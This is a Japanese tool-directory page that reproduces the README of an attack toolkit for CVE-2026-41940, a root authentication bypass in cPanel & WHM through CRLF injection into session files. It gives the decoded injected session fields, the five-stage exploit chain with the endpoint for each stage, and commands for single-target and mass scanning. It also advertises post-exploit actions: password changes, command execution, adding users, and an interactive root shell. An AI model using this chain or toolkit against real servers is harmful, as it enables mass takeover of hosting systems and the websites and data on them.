Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Automated-scanner-CVE-2026-41940 — CVE-2026-41940用の自動スキャナー&ポストエクスプロイテーションツールキット — cPanel & WHMのルート認証バイパス(session-file CRLF injection経由) | Kitploit
ツール/GitHubGitHub/sardine-web/automated-scanner-cve-2026-41940
認証と認可偵察脆弱性スキャナーエクスプロイトウェブアプリケーション悪用情報収集ポストエクスプロイトペネトレーションテストコマンド&コントロール

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
レッドチーミング
ペイロード開発
GitHubsardine-web/automated-scanner-cve-2026-41940

Automated-scanner-CVE-2026-41940

CVE-2026-41940用の自動スキャナー&ポストエクスプロイテーションツールキット — cPanel & WHMのルート認証バイパス(session-file CRLF injection経由)

リポジトリを見る
1174ヶ月前未レビュー

CPANEL CVE EXPLOIT

English | فارسی (Persian)

 ██████╗██████╗  █████╗ ███╗   ██╗███████╗██╗
██╔════╝██╔══██╗██╔══██╗████╗  ██║██╔════╝██║
██║     ██████╔╝███████║██╔██╗ ██║█████╗  ██║
██║     ██╔═══╝ ██╔══██║██║╚██╗██║██╔══╝  ██║
╚██████╗██║     ██║  ██║██║ ╚████║███████╗███████╗
 ╚═════╝╚═╝     ╚═╝  ╚═╝╚═╝  ╚═══╝╚══════╝╚══════╝

 ██████╗██╗   ██╗███████╗
██╔════╝██║   ██║██╔════╝
██║     ██║   ██║█████╗
██║     ╚██╗ ██╔╝██╔══╝
╚██████╗ ╚████╔╝ ███████╗
 ╚═════╝  ╚═══╝  ╚══════╝

███████╗██╗  ██╗██████╗ ██╗      ██████╗ ██╗████████╗
██╔════╝╚██╗██╔╝██╔══██╗██║     ██╔═══██╗██║╚══██╔══╝
█████╗   ╚███╔╝ ██████╔╝██║     ██║   ██║██║   ██║
██╔══╝   ██╔██╗ ██╔═══╝ ██║     ██║   ██║██║   ██║
███████╗██╔╝ ██╗██║     ███████╗╚██████╔╝██║   ██║
╚══════╝╚═╝  ╚═╝╚═╝     ╚══════╝ ╚═════╝ ╚═╝   ╚═╝

Python CVE CVSS License Stdlib

CVE-2026-41940 のための自動スキャナー&ポストエクスプロイトツールキット — セッションファイルの CRLF インジェクションによる cPanel & WHM の root 認証バイパス。


目次

  • 概要
  • CVE 詳細
  • 動作原理
  • 機能
  • 影響を受けるバージョン
  • 必要条件
  • インストール
  • クイックスタート
  • 使用方法
  • ポストエクスプロイトアクション
  • インタラクティブ WHM シェル
  • 大量スキャン&パイプライン統合
  • Shodan ダーク
  • 出力形式
  • セッション例
  • 法的免責事項

概要

CPANEL CVE EXPLOIT は、CVE-2026-41940 に脆弱な cPanel & WHM サーバーに対する認定セキュリティ評価のために設計された単一ファイルの Python ツールです。

この脆弱性により、リモートの認証されていない攻撃者が Authorization: Basic ヘッダーに CRLF インジェクションを仕掛けて WHM セッションファイルを汚染し、認証をバイパスして正規の資格情報なしにルートレベルの WHM アクセスを取得できます。

プロパティ値
CVECVE-2026-41940
深刻度クリティカル
CVSS10.0
攻撃ベクトルネットワーク / 認証不要
影響完全な WHM ルートアクセス
デフォルトポート2087 (WHM)
状況野外での悪用が確認済み (2026年4月)

CVE 詳細

根本原因

脆弱なバージョンの cPanel & WHM では、Session.pm 内の saveSession() がセッションファイルをディスクに書き込んだ後に filter_sessiondata() を呼び出します。攻撃者は HTTP Authorization: Basic ヘッダーを介して CRLF(\r\n)文字を注入でき、それらがディスク上のセッションファイルに直接書き込まれ、サニタイズがバイパスされます。

注入されるセッションフィールド

このツールは、Base64 エンコードされたペイロードを使用します。これをデコードすると次のようになります。

root:x
successful_internal_auth_with_timestamp=9999999999
user=root
tfa_verified=1
hasroot=1

これらのフィールドは、完全に認証されたルート WHM セッションをシミュレートし、2FA バイパス(tfa_verified=1)とルート権限フラグ(hasroot=1)を含みます。

修正

cPanel は filter_sessiondata() を Session.pm のセッション書き込み操作の前に実行するように変更しました。


動作原理

エクスプロイトチェーンは 5 段階(ステージ 0~4)で構成されます。

flowchart TD
    A[Stage 0: Canonical Host Discovery] --> B[Stage 1: Mint Preauth Session]
    B --> C[Stage 2: CRLF Injection via Authorization Header]
    C --> D[Stage 3: Session Propagation via do_token_denied]
    D --> E[Stage 4: Verify Root Access via json-api/version]
    E --> F{Vulnerable?}
    F -->|Yes| G[Post-Exploit Actions / Interactive Shell]
    F -->|No| H[Skip Target]

    A -.- A1["GET /openid_connect/cpanelid → 307 redirect reveals real hostname"]
    B -.- B1["POST /login/?login_only=1 → whostmgrsession cookie"]
    C -.- C1["GET / + poisoned Basic auth → /cpsessXXXXXXXXXX token"]
    D -.- D1["GET /scripts2/listaccts → flush raw session to cache"]
    E -.- E1["GET /cpsessXXX/json-api/version → HTTP 200 + version JSON"]
ステージエンドポイント目的
0/openid_connect/cpanelid307 リダイレクトによる正規ホスト名の自動検出
1/login/?login_only=1間違った資格情報でプリオース whostmgrsession Cookie を取得
2/CRLF で汚染された Authorization: Basic ヘッダーをセッションファイルに注入
3/scripts2/listacctsdo_token_denied ガジェットをトリガーし、セッションをキャッシュにフラッシュ
4/{token}/json-api/versionルートアクセスを確認 — HTTP 200 + バージョン JSON

機能

機能説明
単一ターゲットスキャン1 つの WHM URL に対する完全なエクスプロイトチェーン
大量スキャンファイルまたは標準入力からのマルチスレッドスキャン
バージョン検出パッチ適用済み/脆弱バージョンの自動比較
ポストエクスプロイト APIパスワード変更、コマンド実行、アカウント一覧、ユーザー作成
インタラクティブシェルファイル読み取りと API コマンドを備えた組み込み WHM ルートシェル
Selenium ログインChrome/Firefox にセッション Cookie を自動注入
手動ブラウザフォールバック手動 WHM ログインのためのコンソール JavaScript スニペット
RCE チェックバイパス後の迅速な id / uname -a 確認
JSON エクスポートすべての発見事項を構造化 JSON レポートに保存
パイプライン対応httpx、subfinder、shodan、awk パイプラインで動作
Stdlib のみコア機能に pip 依存関係は不要
カラー出力リアルタイムのステージログと重大度インジケーター

影響を受けるバージョン

ブランチパッチ適用バージョン状況
11.110.x11.110.0.97パッチ未満は脆弱
11.118.x11.118.0.63パッチ未満は脆弱
11.126.x11.126.0.54パッチ未満は脆弱
11.132.x11.132.0.29パッチ未満は脆弱
11.134.x11.134.0.20パッチ未満は脆弱
11.136.x11.136.0.5パッチ未満は脆弱

注: パッチが適用されたビルドを実行しているターゲットは、スキャン中に自動的にフラグが付けられ、スキップされます。


必要条件

コア(必須)

  • Python 3.8+
  • 外部パッケージは不要 — Python 標準ライブラリのみを使用

オプション

パッケージ目的
seleniumブラウザ自動ログイン (--selenium)
Chrome / FirefoxSelenium 用ブラウザエンジン
pip install -r requirements.txt   # オプション — selenium のみ

インストール

git clone https://github.com/YOUR_USERNAME/cpanel-cve-exploit.git
cd cpanel-cve-exploit

ビルド手順は不要です。直接実行します。

python3 test-cve.py --help

クイックスタート

# 単一の WHM ターゲットをスキャン
python3 test-cve.py -u https://target.com:2087

# ポストエクスプロイトでスキャン:すべての cPanel アカウントを一覧表示
python3 test-cve.py -u https://target.com:2087 --action list

# ファイルから大量スキャン、20 スレッド、JSON レポートを保存
python3 test-cve.py -l targets.txt -t 20 -o results.json

使用方法

usage: test-cve.py [-h] [-u URL] [-l LIST] [--hostname HOSTNAME]
                   [-t THREADS] [--timeout TIMEOUT] [--rate-limit RATE_LIMIT]
                   [--action {list,passwd,cmd,exec,info,version,shell,adduser}]
                   [--passwd PASSWD] [--cmd CMD]
                   [--new-user NEW_USER] [--new-domain NEW_DOMAIN]
                   [--read-file READ_FILE] [--selenium]
                   [--engine {chrome,firefox}] [--browser] [--check-rce]
                   [-o OUTPUT] [--no-color]

ターゲットオプション

フラグ説明
-u, --url単一ターゲット URL(例: https://host:2087)
-l, --listURL を 1 行に 1 つずつ含むファイル
--hostname正規の Host ヘッダーを上書き(デフォルトでは自動検出)

スキャンオプション

フラグデフォルト説明
-t, --threads10同時スキャンスレッド数
--timeout15HTTP タイムアウト(秒)
--rate-limit0ターゲット送信間の遅延(秒)

出力オプション

フラグ説明
-o, --output発見事項を JSON ファイルに保存
--no-colorANSI カラー出力を無効化

ポストエクスプロイトアクション

ポストエクスプロイトフラグは単一ターゲットのみで動作します(-u、大量スキャンでは不可)。

ツールをダウンロード